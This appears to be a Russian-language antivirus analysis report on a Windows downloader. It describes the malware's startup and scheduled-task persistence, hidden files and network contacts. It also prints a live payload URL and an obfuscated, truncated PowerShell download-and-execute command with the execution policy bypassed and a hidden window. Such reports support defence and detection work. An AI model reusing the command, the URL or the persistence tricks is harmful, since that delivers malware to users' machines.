Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\jbsrwawe.lnk
- <SYSTEM32>\tasks\opera scheduled autoupdate 3131961373
Вредоносные функции
Загружает и запускает на исполнение
- https://u.teknik.io/28olw.jpg как %temp%\evdwacbtpw.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\evdwacbtpw.exe
- %APPDATA%\microsoft\windows\jbsrwawe\wwjicbic.exe
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\microsoft\windows\jbsrwawe\wwjicbic.exe
Удаляет следующие файлы
- %TEMP%\evdwacbtpw.exe
Сетевая активность
Подключается к
- 'u.##knik.io':443
- 'ms###csi.com':80
- '94.##0.115.43':80
TCP
- 'u.##knik.io':443
UDP
- DNS ASK u.##knik.io
Другое
Создает и запускает на исполнение
- '%TEMP%\evdwacbtpw.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAo...' (со скрытым окном)
